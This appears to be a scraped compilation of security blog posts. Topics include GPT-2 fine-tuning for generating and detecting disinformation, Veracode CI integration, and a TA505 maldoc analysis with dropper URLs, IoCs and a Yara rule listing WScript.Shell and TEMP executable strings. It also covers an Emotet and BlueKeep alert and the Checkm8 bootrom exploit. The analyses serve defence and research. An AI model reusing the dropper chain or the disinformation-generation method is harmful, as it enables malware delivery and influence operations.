and that's awful! OMG! No way! #Nukraine<|endoftext|>”
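This suffixing step can be sketched as a small helper. This is a minimal illustration; the real pipeline feeds tokenized posts to GPT-2 rather than raw strings, and the function name is ours, not from the research.

```python
def prepare_posts(posts, eos="<|endoftext|>"):
    """Append the end-of-text marker to each post so the fine-tuned model
    learns where short social media texts terminate."""
    return [post.rstrip() + eos for post in posts]

samples = prepare_posts([
    "#Fukushima2015 Zaporozhia NPP can explode at any time "
    "and that's awful! OMG! No way! #Nukraine",
])
print(samples[0])
```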

Figure 2 depicts a few example generations made after fine-tuning GPT-2 on the IRA datasets. Observe how these text generations are formatted like something we might expect to encounter scrolling through social media – they are short yet biting, express certainty and outrage regarding political issues, and contain emphases like an exclamation point. They also contain idiosyncrasies like hashtags and emojis that positionally manifest at the end of the generated text, depicting a semantic style regularly exhibited by actual users.


Figure 2: Fine-tuning GPT-2 using the IRA datasets for the language modeling task. Example generations are primed with the same phrase from Figure 1, “It’s disgraceful that.” Hyphens are added for readability and not produced by the model.

How does the model produce such credible generations? Besides the weights that were adjusted during LM fine-tuning, some of the heavy lifting is also done by the underlying attention scores that were learned by GPT-2’s Transformer. Attention scores are computed between all words in a text sequence, and represent how important one word is when determining how important its nearby words will be in the next learning iteration. To compute attention scores, the Transformer performs a dot product between a Query vector q and a Key vector k:

  • q encodes the current hidden state, representing the word that searches for other words in the sequence to pay attention to that may help supply context for it.
  • k encodes the previous hidden states, representing the other words that receive attention from the query word and might contribute a better representation for it in its current context.

Figure 3 displays how this dot product is computed based on single neuron activations in q and k using an attention visualization tool called bertviz. Columns in Figure 3 trace the computation of attention scores from the highlighted word on the left, “America,” to the complete sequence of words on the right. For example, to decide to predict “#” following the word “America,” this part of the model focuses its attention on preceding words like “ban,” “Immigrants,” and “disgrace,” (note that the model has broken “Immigrants” into “Imm” and “igrants” because “Immigrants” is an uncommon word relative to its component word pieces within pre-trained GPT-2's original training dataset).  The element-wise product shows how individual elements in q and k contribute to the dot product, which encodes the relationship between each word and every other context-providing word as the network learns from new text sequences. The dot product is finally normalized by a softmax function that outputs attention scores to be fed into the next layer of the neural network.


Figure 3: The attention patterns for the query word highlighted in grey from one of the fine-tuned GPT-2 generations in Figure 2. Individual vertical bars represent neuron activations, horizontal bars represent vectors, and lines represent the strength of attention between words. Blue indicates positive values, red indicates negative values, and color intensity represents the magnitude of these values.

Syntactic relationships between words like “America,” “ban,” and “Immigrants“ are valuable from an analysis point of view because they can help identify an information operation’s interrelated keywords and phrases. These indicators can be used to pivot between suspect social media accounts based on shared lexical patterns, help identify common narratives, and even to perform more proactive threat hunting. While the above example only scratches the surface of this complex, 355 million parameter model, qualitatively visualizing attention to understand the information learned by Transformers can help provide analysts insights into linguistic patterns being deployed as part of broader information operations activity.
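The query-key dot product and softmax normalization described above can be written out numerically. This is a schematic sketch with made-up 4-dimensional vectors, far smaller than the model's real hidden size, and it omits GPT-2's scaling factor and multi-head structure.

```python
import math

def attention_scores(q, keys):
    """Dot product between the query vector and each key vector, normalized
    by softmax into attention scores that sum to 1."""
    logits = [sum(qi * ki for qi, ki in zip(q, k)) for k in keys]
    m = max(logits)                      # subtract max for numerical stability
    exp = [math.exp(x - m) for x in logits]
    total = sum(exp)
    return [e / total for e in exp]

q = [0.5, -1.0, 0.3, 0.8]                # query: the current word
keys = [[0.4, -0.9, 0.2, 0.7],           # keys: preceding context words
        [0.1, 0.1, -0.3, 0.0],
        [0.6, -1.1, 0.5, 0.9]]
scores = attention_scores(q, keys)
print(scores)
```

The third key is most aligned with the query, so it receives the largest attention score; words with near-orthogonal keys receive correspondingly little attention.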

Detecting Information Operations Activity by Fine-Tuning GPT-2 for Classification

In order to further support FireEye Threat Analysts’ work in discovering and triaging information operations activity on social media, we next fine-tuned a detection model to perform classification. Just like when we adapted GPT-2 for a new language modeling task in the previous section, we did not need to make any drastic architectural changes or parameter updates to fine-tune the model for the classification task. However, we did need to provide the model with a labeled dataset, so we grouped together social media posts based on whether they were leveraged in information operations (class label CLS = 1) or were benign (CLS = 0).

Benign, English-language posts were gathered from verified social media accounts, which generally corresponded to public figures and other prominent individuals or organizations whose posts contained diverse, innocuous content. For the purposes of this blog post, information operations-related posts were obtained from the previously mentioned open source IRA datasets. For the classification task, we separated the IRA datasets that were previously combined for LM fine-tuning, and selected posts from only one of them for the group associated with CLS = 1. To perform dataset selection quantitatively, we fine-tuned LMs on each IRA dataset to produce three different LMs while keeping 33% of the posts from each dataset held out as test data. Doing so allowed us to quantify the overlap between the individual IRA datasets based on how well one dataset’s LM was able to predict post content originating from the other datasets.


Figure 4: Confusion matrix representing perplexities of the LMs on their test datasets. The LM corresponding to the GPT-2 row was not fine-tuned; it corresponds to the pretrained GPT-2 model with reported perplexity of 18.3 on its own test set, which was unavailable for evaluation using the LMs. The Reddit dataset was excluded due to the low volume of samples.

In Figure 4, we show the result of computing perplexity scores for each of the three LMs and the original pre-trained GPT-2 model on held out test data from each dataset. Lower scores indicate better perplexity, which captures the probability of the model choosing the correct next word. The lowest scores fell along the main diagonal of the perplexity confusion matrix, meaning that the fine-tuned LMs were best at predicting the next word on test data originating from within their own datasets. The LM fine-tuned on Twitter’s Elections Integrity dataset displayed the lowest perplexity scores when averaged across all held out test datasets, so we selected posts sampled from this dataset to demonstrate classification fine-tuning.
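Perplexity, the metric used above to compare the LMs, is the exponential of the average negative log-likelihood the model assigns to the held-out words. This sketch uses made-up per-word probabilities, not the actual evaluation code:

```python
import math

def perplexity(token_probs):
    """exp of the average negative log-likelihood; lower means the model
    was less 'surprised' by the held-out text."""
    nll = [-math.log(p) for p in token_probs]
    return math.exp(sum(nll) / len(nll))

confident = perplexity([0.5, 0.4, 0.6])    # model often picks the right word
uncertain = perplexity([0.05, 0.02, 0.1])  # model is surprised by the text
print(confident, uncertain)
```

A model that always assigned probability 0.5 to the correct next word would score a perplexity of exactly 2, which is why the fine-tuned LMs score lowest on test data drawn from their own training distribution.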


Figure 5: (A) Training loss histories during GPT-2 fine-tuning for the classification (red) and LM (grey, inset) tasks. (B) ROC curve (red) evaluated on the held out fine-tuning test set, contrasted with random guess (grey dotted).

To fine-tune for the classification task, we once again processed the selected dataset’s posts through the pre-trained GPT-2 model. This time, activations were fed through adjustable weights into two linear output layers instead of just the single one used for the language modeling task in the previous section. Here, fine-tuning was formulated as a multi-task objective with classification loss together with an auxiliary LM loss, which helped accelerate convergence during training and improved the generalization of the model. We also prepended posts with a new [BOS] (i.e. Beginning Of Sentence) string and suffixed posts with the previously mentioned [CLS] class label string, so that each post was fed into the model according to:

“[BOS]Kevin Mandia was on @CNBC’s @MadMoneyOnCNBC with @jimcramer discussing targeted disinformation heading into the… https://t.co/l2xKQJsuwk[CLS]”

The [BOS] string played a similar delimiting role to the <|endoftext|> string used previously in LM fine-tuning, and the [CLS] string encoded the hidden state ∈ {0, 1} that was the label fed to the model’s classification layer. The example social media post above came from the benign dataset, so this sample’s label was set to CLS = 0 during fine-tuning. Figure 5A shows the evolution of classification and auxiliary LM losses during fine-tuning, and Figure 5B displays the ROC curve for the fine-tuned classifier on its test set consisting of around 66,000 social media posts. The convergence of the losses to low values, together with a high Area Under the ROC Curve (i.e. AUC), illustrates that transfer learning allowed this model to accurately detect social media posts associated with IRA information operations activity versus benign ones. Taken together, these metrics indicate that the fine-tuned classifier should generalize well to newly ingested social media posts, providing analysts a capability they can use to separate signal from noise.
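The multi-task objective can be sketched as a weighted sum of the two losses. This is a schematic; the weighting coefficient is hypothetical, not a value reported in the research.

```python
def multitask_loss(classification_loss, lm_loss, lm_weight=0.5):
    """Combine the classification loss with an auxiliary language-modeling
    loss. The auxiliary term helps convergence and generalization during
    fine-tuning; lm_weight is an assumed coefficient for illustration."""
    return classification_loss + lm_weight * lm_loss

print(multitask_loss(0.30, 0.80))
```

In training, both terms are backpropagated together, which is why Figure 5A shows the classification and auxiliary LM losses declining side by side.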

Conclusion

In this blog post, we demonstrated how to fine-tune a neural LM on open source datasets containing social media posts previously leveraged in information operations. Transfer learning allowed us to classify these posts with a high AUC score, and FireEye’s Threat Analysts can utilize this detection capability in order to discover and triage similar emergent operations. Additionally, we showed how Transformer models assign scores to different pieces of text via an attention mechanism. This visualization can be used by analysts to tease apart adversary tradecraft based on posts’ linguistic fingerprints and semantic stylings.

Transfer learning also allowed us to generate credible synthetic text with low perplexity scores. One of the barriers actors face when devising effective information operations is adequately capturing the nuances and context of the cultural climate in which their targets are situated. Our exercise here suggests this costly step could be bypassed using pre-trained LMs, whose generations can be fine-tuned to embody the zeitgeist of social media. GPT-2’s authors and subsequent researchers have warned about potential malicious use cases enabled by this powerful natural language generation technology, and while our research was conducted for a defensive application in a controlled offline setting using readily available open source data, it reinforces this concern. As trends towards more powerful and readily available language generation models continue, it is important to redouble efforts towards detection as demonstrated by Figure 5 and other promising approaches such as Grover.

This research was conducted during a three-month FireEye IGNITE University Program summer internship, and represents a collaboration between the FDS and FireEye Threat Intelligence’s Information Operations Analysis teams. If you are interested in working on multidisciplinary projects at the intersection of cyber security and machine learning, please consider applying to one of our 2020 summer internships.

How to Leverage YAML to Integrate Veracode Solutions Into CI/CD Pipelines

YAML scripting is frequently used to simplify configuration management of CI/CD tools. This blog post shows how YAML scripts for build tools like Circle CI, Concourse CI, GitLab, and Travis can be edited to create integrations with the Veracode Platform. Integrating Veracode AppSec solutions into CI/CD pipelines enables developers to embed remediation of software vulnerabilities directly into their SDLC workflows, creating a more efficient process for building secure applications. You can also extend the script template proposed in this blog to integrate Veracode AppSec scanning with almost any YAML-configured build tool.

Step One: Environment Requirements

The first step is to confirm that your selected CI tool supports YAML-based pipeline definitions; we assume you are spinning up Docker images to run your CI/CD workflows. Your Docker images can run either Java or .NET, but the scripts included in this article target Java only, so confirm your environment matches before moving on to the next step.

Step Two: Setting Up Your YAML File

The second step is to locate the YAML configuration file, which for many CI tools is named config.yml. The basic syntax is the same for most build tools, with some minor variations. The links below contain configuration file scripts for Circle CI, Concourse CI, GitLab, and Travis, which you can also use as examples for adapting the config files of other build tools.

Step Three: Downloading the Java API Wrapper

The next step requires downloading the Java API wrapper, which can be done by using the script below.

# grab the Veracode agent
run:
    name: "Get the Veracode agent"
    command: |
      wget https://repo1.maven.org/maven2/com/veracode/vosp/api/wrappers/vosp-api-wrappers-java/19.2.5.6/vosp-api-wrappers-java-19.2.5.6.jar -O VeracodeJavaAPI.jar

Step Four: Adding Veracode Scan Attributes to Build Pipelines

The final step is entering into the script all the information required to interact with Veracode APIs, including data attributes like users' access credentials, application name, build tool version number, etc. Veracode has created a rich library of APIs that provide numerous options for interacting with the Veracode Platform, and that enable customers and partners to create their own integrations. Information on Veracode APIs is available in the Veracode Help Center.

The script below demonstrates how to add attributes to the Circle CI YAML configuration file so that the script can call the uploadandscan API, which uploads the application from Circle CI to the Veracode Platform and triggers the Platform to run the application scan.

run:
    name: "Upload to Veracode"
    command: >
      java -jar VeracodeJavaAPI.jar
      -vid $VERACODE_API_ID
      -vkey $VERACODE_API_KEY
      -action uploadandscan
      -appname $VERACODE_APP_NAME
      -createprofile false
      -version CircleCI-$CIRCLE_BUILD_NUM
      -filepath upload.zip

In this example, we have defined:

name - the step name defined in this script

command - the command that runs the Veracode API; details on downloading the API jar are provided in the previous step

-vid $VERACODE_API_ID - the user's Veracode API ID credential

-vkey $VERACODE_API_KEY - the user's Veracode API key credential

-action uploadandscan - the name of the Veracode API action invoked by this script

-appname $VERACODE_APP_NAME - the name of the customer application targeted for uploading and scanning. This application name should be defined identically to the way it is defined in the application profile on the Veracode Platform

-createprofile false - a Boolean that defines whether an application profile should be created automatically if $VERACODE_APP_NAME does not match an existing application profile.

  • If defined as true, an application profile is created automatically when no matching name is found, and the upload and scan steps continue
  • If defined as false, no application profile is created, and no further upload and scan actions are taken

-version CircleCI-$CIRCLE_BUILD_NUM - the name of this scan, composed here from the Circle CI build number so that each build produces a uniquely labeled scan

-filepath upload.zip - the location of the application archive to upload to the Veracode API

With these four steps, Veracode scanning is now integrated into a new CI/CD pipeline.
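Putting steps three and four together, a complete Circle CI config.yml job might look like the following sketch. The job name, Docker image, and workflow wiring are illustrative assumptions, not taken from the original scripts; adjust them to your project.

```yaml
version: 2.1
jobs:
  veracode-scan:          # illustrative job name
    docker:
      - image: cimg/openjdk:11.0   # assumed Java image; any Java-capable image works
    steps:
      - checkout
      - run:
          name: "Get the Veracode agent"
          command: |
            wget https://repo1.maven.org/maven2/com/veracode/vosp/api/wrappers/vosp-api-wrappers-java/19.2.5.6/vosp-api-wrappers-java-19.2.5.6.jar -O VeracodeJavaAPI.jar
      - run:
          name: "Upload to Veracode"
          command: >
            java -jar VeracodeJavaAPI.jar
            -vid $VERACODE_API_ID
            -vkey $VERACODE_API_KEY
            -action uploadandscan
            -appname $VERACODE_APP_NAME
            -createprofile false
            -version CircleCI-$CIRCLE_BUILD_NUM
            -filepath upload.zip
workflows:
  build-and-scan:
    jobs:
      - veracode-scan
```

The API credentials are read from environment variables, which in Circle CI would be set as project or context environment variables rather than committed to the repository.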

Integrating application security scanning directly into your build tools enables developers to incorporate security scans into their SDLC. Finding software vulnerabilities earlier in the development cycle allows for simpler remediation and more efficient issue resolution, enabling Veracode customers to build more secure software without compromising on development deadlines.

For additional information on Veracode Integrations, please visit our integrations page.

To Measure Bias in Data, NIST Initiates ‘Fair Ranking’ Research Effort

A new research effort at the National Institute of Standards and Technology (NIST) aims to address a pervasive issue in our data-driven society: a lack of fairness that sometimes turns up in the answers we get from information retrieval software. Software of this type is everywhere, from popular search engines to less-known algorithms that help specialists comb through databases. This software usually incorporates forms of artificial intelligence that help it learn to make better decisions over time. But it bases these decisions on the data it receives, and if that data is biased in some way, its answers can be biased as well.

TA-505 Cybercrime on System Integrator Companies

Introduction

During routine monitoring activity, one of our detection tools flagged a suspicious email coming from the validtree.com domain. The domain's registration was hidden behind a Panama-based privacy company, a condition that rang a warning bell and warranted a manual analysis of the attachment.
Digging into this malicious artifact pointed to a possible rising interest of the infamous TA505 group in system integrator companies (companies in which this threat has been found).

Technical Analysis

During the past few weeks, suspicious emails coming from the validtree.com domain were detected, addressing system integration companies. The domain validtree.com was registered through namecheap.com on 2017-12-07T15:55:27Z and recently renewed on 2019-10-16T05:35:18Z. The registrant is protected by a Panama company named WhoisGuard, which hides the original registrant's name. Currently the domain points to 95.211.151.230, an IP address assigned to LeaseWeb, a VPS hosting provider located in the Netherlands. Attached to the email was a suspicious Word document waiting to be opened by the victim.

Hash: 7ebd1d6fa8c21b0d0c015475ab8c7225f949c13a33d0a39b8c069072a4281392
Threat: Macro Dropper
Brief Description: Document Dropper
Ssdeep: 384:nFZ5ZtDGGkLmTUrioRPATRn633Dmej0SnJzbmiVywP0jKk:n1oqwT2J633DVgiVy25

When the victim opens the Word document, the following text is displayed (Image1). The document tempts the victim into enabling the macro functionality, claiming it will re-encode the document into readable charsets by translating the current encoding to the local one.

Image1: Word Document Content

A transparent Microsoft Word shape placed on top of the encoded text prevents the victim from interacting with the unreadable content. The document holds two VBA macro functions: the classic AutoOpen and an additional one named HeadrFooterProperty. Interestingly, the document had no detections on VirusTotal at analysis time, so it could be a revamped threat or a totally new one. The two macros decode a JavaScript payload acting as a drop-and-execute stage, using a well-known strategy described in “Frequent VBA Macros used in Office Malware”. The following image shows the decoding process. The attacker adopted a first round of obfuscation to make the analyst's decoding work harder: that stage implements obfuscated embedded JavaScript which decodes, using XOR with key=11, a third JavaScript stage acting as drop-and-execute against a resource on 66.133.129.5, an IP address assigned to Frontier Communications Solutions, a NY-based company.
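The single-byte XOR decoding described above (key=11) can be illustrated with a short sketch; the payload string here is a made-up stand-in for the demo, not the actual malware stage:

```python
def xor_decode(data: bytes, key: int = 11) -> bytes:
    """Single-byte XOR: the same operation both obfuscates and decodes."""
    return bytes(b ^ key for b in data)

# Round-trip demo with a made-up stand-in payload
obfuscated = xor_decode(b"var emotionless = 'JavaScript';")
print(xor_decode(obfuscated).decode())
```

Because XOR is its own inverse, applying the function twice with the same key recovers the original bytes, which is exactly what the embedded JavaScript stage does to reveal the downloader.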

Image2: Deobfuscation Steps from obfuscated VBA to Clear “evaled” javascript

It was entertaining to read the obfuscated code, since the variable names were thematically chosen per function. For example, the theseus function is obfuscated with “divine terms”; one of my favorites was the conditional branch If pastorale / quetzalcoatl < 57 Then ..., which was always true! 😀 (Quetzalcoatl, the “feathered serpent”, is an Aztec god, while a pastorale is an evocative composition often used to cite or pray to gods.) Another fun fact was the variable name the attacker assigned to the string “JavaScript”: emotionless. In particular, the attacker refers to JavaScript through the object “emotionless.Language”. Funny, isn't it?
The final JavaScript downloader drops a file from http://66[.133[.129[.5/~chuckgilbert/09u8h76f/65fg67n into the system temporary directory, names it nanagrams.exe, and finally runs that Windows PE file on the victim machine.
At analysis time the dropping URL was not working; in fact, the dropping URL points to a surprise.php. A misconfiguration of the dropping website allowed us to view its source code. As shown in the following image (Image3), the page tracks visitors through an iframe pointing to http[://tehnofaq[.work and, through a random loop, redirects the downloader script to a different dropping URL.

Image3: Redirecting script

Building redirectors or proxy chains is quite useful for attackers to evade Intrusion Prevention Systems and other protections based on IP or DNS blocking. In this case the redirection script pushes the visitor to one of the following domains by introducing the HTML meta “refresh” tag, pointing the browser to a random choice among four entries belonging to the following two domains:

  • http[://com-kl96.net
  • http[://com-mk84.net

Possible Link with TA-505

The infrastructure behind the dropping URLs looks like an old infrastructure previously used for propagating ransomware. Indeed, it is possible to observe many analogies with the following dropping URLs belonging to a previously observed ransomware threat:

  • http[://66.133.129.5/~kvas/
  • http[://66.133.129.5/~nsmarc1166/
  • http[://frontiernet.net/~jherbaugh/

The infrastructure used in the attacks suggests the involvement of the cybercrime group TA505. The group, known to have operated both the Dridex and Locky malware families, continues to make small changes to its operations. TA505 has been active since 2014, focusing on the retail and banking sectors.
Recently, security experts at Proofpoint observed the notorious TA505 cybercrime group using a new RAT dubbed SDBbot, a backdoor delivered via a new downloader dubbed Get2 that was written in C++. The downloader was also used to distribute other payloads, including FlawedGrace, FlawedAmmyy, and Snatch. The URLs used in the attack follow the same pattern associated with the crime gang, and the researchers also pointed out that the IP address observed in the attacks (i.e. 66.133.129.5) was involved in previous campaigns delivering Locky and Dridex malware.


Unfortunately, I was not able to analyse the final payload of the attack chain, which was still not available at the time of the analysis. Analysis of the final-stage malware is essential to attribute the attack to a specific threat actor. The evidence and artifacts collected in this analysis suggest two possible scenarios:

  • The TA505 group is expanding its operations but still controls an infrastructure involved in previous attacks across the years. The threat actors may leverage this infrastructure for “hit and run” operations or to test new attack techniques and tools while avoiding exposure of their actual infrastructure. Both options are interesting, but only knowledge of the final-stage malware could give us a wider view of the group's current operations.
  • Another threat actor, likely financially motivated, is leveraging the same infrastructure used by TA505 in order to complicate the analysis and attribution of the attacks.

Conclusion

An interesting maldoc acting as a drop-and-execute stage was identified and spotted in the wild, targeting system integrators based in Europe. Through the described analysis we attempted to identify the attacker, observing that they were exploiting an old infrastructure behind 66.133.129.5 as a dropping site.
At the time of the analysis the attack path was still incomplete and the attacker had not yet weaponized the dropping websites, but the distributed document is able to grab content from specific URLs and run it directly on the victim machine.
The strings used for obfuscating the dropper are actually fun and “thematic”. For example, strings like “madrillus”, “vulcano”, “pastorale” and “quetzalcoatl” recall an ancient culture (mandrillus, vulcano and quetzalcoatl), while objects like “emotionless” assigned to a specific programming language suggest a witty attacker.
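On the subject of obfuscation: the hex-escaped byte strings embedded in the macro (visible as $s11 and $s16 in the Yara rule below) appear to be single-byte XOR encoded, consistent with the JavaScript `charCodeAt` XOR loop captured in $s14. A minimal Python sketch of the decoding follows; the key 0x0b is my own observation from these byte sequences, not something stated in the document, so treat it as an assumption:

```python
def xor_decode(data: bytes, key: int) -> str:
    # Mirror of the JavaScript routine captured in the macro:
    # "(xor_key ^ plain_str.charCodeAt(i)); return xored_str;"
    return "".join(chr(b ^ key) for b in data)

# First bytes of the $s11 string from the Yara rule (hex-escaped in the sample).
blob = bytes([0x64, 0x7B, 0x6E, 0x65, 0x23, 0x29, 0x4C, 0x4E, 0x5F, 0x29])
print(xor_decode(blob, 0x0B))  # → open("GET"
```

Decoded this way, the fragments resolve to WinHTTP-style request code, which fits the document's drop-and-execute behavior.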

Since no final stage has been obtained so far, attribution is quite hard, but the TTPs suggest a TA505 attacker, based on the collected artifacts and the analyzed URLs.

Indicators of Compromise (IoCs)

Hash: 7ebd1d6fa8c21b0d0c015475ab8c7225f949c13a33d0a39b8c069072a4281392
URL:
http://66[.133[.129[.5/~chuckgilbert/09u8h76f/65fg67n
http[://tehnofaq[.work
http[://com-kl96.net/new.php?a=269321&c=wl_con&s=702w’
http[://com-mk84.net/new.php?a=269321&c=wl_con&s=702w’
http[://com-kl96.net/new.php?a=269321&c=job&s=702j’
http[://com-mk84.net/new.php?a=269321&c=job&s=702j’

Yara Rules

rule TA505_Target_SystemIntegrators_sample {
   meta:
      description = "TA505 target System Integrators"
      date = "2019-11-11"
      hash1 = "7ebd1d6fa8c21b0d0c015475ab8c7225f949c13a33d0a39b8c069072a4281392"
   strings:
      $x1 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide
      $s2 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.3#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE11\\MSO.DLL#Microsoft " wide
      $s3 = "'%TEMP%\\conjunctiva.exe'" fullword ascii
      $s4 = "rams.exe" fullword ascii
      $s5 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA6\\VBE6.DLL#Visual Basic For Applicat" wide
      $s6 = "WScript.Shell" fullword ascii
      $s7 = "\\nanagrams.exe" fullword ascii
      $s8 = "*\\G{00020905-0000-0000-C000-000000000046}#8.3#0#C:\\Program Files\\Microsoftvolcano" fullword wide
      $s9 = " Office\\OFFICE11\\MSWORD.OLB#Microsoft Word 11.0 Object Library" fullword wide
      $s10 = "PROJECT.THISDOCUMENT.AUTOOPEN" fullword wide
      $s11 = "5\\x64\\x7b\\x6e\\x65\\x23\\x29\\x4c\\x4e\\x5f\\x29\\x27\\x7e\\x79\\x67\\x27\\x6d\\x6a\\x67\\x78\\x6e\\x22\\x30\\x2b\\x" fullword ascii
      $s12 = "Project.ThisDocument.AutoOpen" fullword wide
      $s13 = "mistyeyed" fullword ascii
      $s14 = "(xor_key ^ plain_str.charCodeAt(i)); return xored_str;}" fullword ascii
      $s15 = "IVa.ExE'); StaRT " fullword ascii
      $s16 = "65\\x2b\\x73\\x63\\x79\\x25\\x79\\x6e\\x78\\x7b\\x64\\x65\\x78\\x6e\\x49\\x64\\x6f\\x72\\x30\\x2b" fullword ascii
      $s17 = "costaTEMP%instantaneous" fullword ascii
      $s18 = "wdSeekCurrentPageHeader$$0" fullword ascii
      $s19 = "TEMP%in " fullword ascii
      $s20 = "conjecturalitygclamydospore" fullword ascii
   condition:
      uint16(0) == 0xcfd0 and filesize < 100KB and
      1 of ($x*) and 4 of them
}

National Cyber Security Committee urges vigilance as two concerning cyber security threats are in the wild

UPDATE: As at 12th November 2019 the CIMA level returned to Level 5 - Normal Conditions. The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), with its state and territory partners, is continuing to respond to the widespread malware campaign known as Emotet while responding to reports that hackers are exploiting the BlueKeep vulnerability to mine cryptocurrency. The Cyber Incident Management Arrangements (CIMA) remain activated; however, the alert level has been downgraded to Level 4 – ‘Lean Forward’.

Seven Security Strategies, Summarized

This is the sort of story that starts as a comment on Twitter, then becomes a blog post when I realize I can't fit all the ideas into one or two Tweets. (You know how much I hate Tweet threads, and how I encourage everyone to capture deep thoughts in blog posts!)

In the interest of capturing the thought, and not in the interest of thinking too deeply or comprehensively (at least right now), I offer seven security strategies, summarized.

When I mention the risk equation, I'm talking about the idea that one can conceptually imagine the risk of some negative event using this "formula": Risk (of something) is the product of some measurements of Vulnerability X Threat X Asset Value, or R = V x T x A.

  1. Denial and/or ignorance. This strategy assumes the risk due to loss is low, because those managing the risk assume that one or more of the elements of the risk equation are zero or almost zero, or they are apathetic to the cost.
  2. Loss acceptance. This strategy may assume the risk due to loss is low, or more likely those managing the risk assume that the cost of risk realization is low. In other words, incidents will occur, but the cost of the incident is acceptable to the organization.
  3. Loss transferal. This strategy may also assume the risk due to loss is low, but in contrast with risk acceptance, the organization believes it can buy an insurance policy which will cover the cost of an incident, and the cost of the policy is cheaper than alternative strategies.
  4. Vulnerability elimination. This strategy focuses on driving the vulnerability element of the risk equation to zero or almost zero, through secure coding, proper configuration, patching, and similar methods.
  5. Threat elimination. This strategy focuses on driving the threat element of the risk equation to zero or almost zero, through deterrence, dissuasion, co-option, bribery, conversion, incarceration, incapacitation, or other methods that change the intent and/or capabilities of threat actors. 
  6. Asset value elimination. This strategy focuses on driving the asset value element of the risk equation to zero or almost zero, through minimizing data or resources that might be valued by adversaries.
  7. Interdiction. This is a hybrid strategy which welcomes contributions from vulnerability elimination, primarily, but is open to assistance from loss transferal, threat elimination, and asset value elimination. Interdiction assumes that prevention eventually fails, but that security teams can detect and respond to incidents post-compromise and pre-breach. In other words, some classes of intruders will indeed compromise an organization, but it is possible to detect and respond to the attack before the adversary completes his mission.
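The multiplicative nature of the risk equation is what gives each strategy its leverage: driving any one factor toward zero drives the product toward zero. A toy sketch (the numbers are purely illustrative, not from the post):

```python
def risk(vulnerability: float, threat: float, asset_value: float) -> float:
    # R = V x T x A, per the risk equation above.
    return vulnerability * threat * asset_value

baseline = risk(vulnerability=0.8, threat=0.6, asset_value=100)

# Strategy 4 (vulnerability elimination): drive V toward zero via patching etc.
after_patching = risk(vulnerability=0.1, threat=0.6, asset_value=100)

# Strategy 6 (asset value elimination): drive A toward zero by minimizing data.
after_minimization = risk(vulnerability=0.8, threat=0.6, asset_value=10)

print(baseline, after_patching, after_minimization)
```

Because the factors multiply, zeroing any single one zeroes the risk entirely, which is why strategies 4 through 6 each target exactly one element.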
As you might expect, I am most closely associated with the interdiction strategy. 

I believe the denial and/or ignorance and loss acceptance strategies are irresponsible.

I believe the loss transferal strategy continues to gain momentum with the growth of cybersecurity breach insurance policies. 

I believe the vulnerability elimination strategy is important but ultimately, on its own, ineffective and historically shown to be impossible. When used in concert with other strategies, it is absolutely helpful.

I believe the threat elimination strategy is generally beyond the scope of private organizations. As the state retains the monopoly on the use of force, usually only law enforcement, military, and sometimes intelligence agencies can truly eliminate or mitigate threats. (Threats are not vulnerabilities.)

I believe asset value elimination is powerful but has not gained the ground I would like to see. This is my "If you can’t protect it, don’t collect it" message. The limitation here is obviously one's raw computing elements. If one were to magically strip down every computing asset into basic operating systems on hardware or cloud infrastructure, the fact that those assets exist and are networked means that any adversary can abuse them for mining cryptocurrencies, or as infrastructure for intrusions, or for any other uses of raw computing power.

Please notice that none of the strategies listed tools, techniques, tactics, or operations. Those are important but below the level of strategy in the conflict hierarchy. I may have more to say on this in the future. 

Checkm8 Implications on iOS DFIR, TFP0, #FreeTheSandbox, Apple, and Google

Thanks to Checkm8 – a bootrom vulnerability that exists on most iPhones/iPads (pre-A12) – a generic method to bypass the iOS sandbox restrictions will be made public within days/weeks for all previous and future versions of iOS! An upcoming release of a generic capability to extract the filesystem of a suspect iOS device will help to boost digital forensics investigations.

Which devices are vulnerable? Almost every iPhone/iPad up to and including the iPhone X.
Which devices are not vulnerable? The iPhone Xs/Xr and 11/11 Pro.

Notably, the release of checkm8 will help to enhance Digital Forensics and Incident Response (DFIR) on the iPhone X (and all previous models) and make it easier to perform deep investigations compared to newer models such as the iPhone Xs / Xr / 11. Whilst iPhones running on A12+ chipsets benefit from the Pointer Authentication Code (PAC) security mitigation, which makes exploitation significantly harder, the inspectability of such devices remains a major challenge and is crucial for successful DFIR investigations when an initial suspicion is raised.

Furthermore, this vulnerability, amongst other capabilities, allows iPhone owners to modify boot arguments which, for example, can enable users to have an even safer iOS version than vanilla iOS.

When ZecOps started the #FreeTheSandbox initiative, we did not foresee a release of a bootrom exploit covering the latest production devices. Thanks to @axi0mX bootrom exploits have become a reality and changed the game. A number of experienced and reputable researchers (such as @qwertyoruiopz, @siguza and many other fine individuals) worked tirelessly to make use of checkm8 in order to set the iOS sandbox free (a.k.a Checkra1n). 

Soon it will be released publicly.

Implications to Apple & Google:

Since almost every iOS device is now susceptible to jailbreaking without requiring new exploit chains or bypassing mitigation techniques, it is time for Apple to rethink its sandboxing strategy and allow iOS users to freely inspect their devices including A12 and A13 devices without the need of a Local Privilege Escalation (LPE) exploit. 

Device vendors, such as Apple and Google, will soon realize that Checkm8-style unpatchable vulnerabilities are inevitable. Restricting the sandbox policy against device owners does not make sense and only benefits attackers, who oftentimes leverage the sandbox to avoid detection.

A notable case was Google Project Zero’s discovery of 14 vulnerabilities leveraged in the wild against any iOS visitor of certain websites, while the attackers didn’t even try to hide and executed their payloads from a tmp folder. Following Checkm8, many researchers will take a closer look at bootrom vulnerabilities. Since boot-level vulnerabilities are unavoidable, we would like to encourage Google & Apple to open up Android/iOS for inspectability with the consent of end users. This will enable complete DFIR investigations without flashing a new image, slowing down time-critical investigations, or tampering with attack evidence.

Should device vendors decide to consider this, ZecOps will collaborate with each vendor to enumerate the key capabilities that would be important to enable mobile DFIR investigations. Furthermore, enabling users to inspect their devices does not increase device issues; on the contrary, organizations that permit a CYOD policy would prefer devices that are inspectable, especially in the Defense / Government sectors.

Update to ZecOps Task-For-Pwn-0 Project

Following this release, ZecOps decided that we should focus more on bootrom vulnerabilities for both iOS and Android. 

  • iOS Bootrom vulnerabilities for A12/A13: We’re willing to offer up to $250,000 bounties for A12 and A13 bootrom vulnerabilities. 
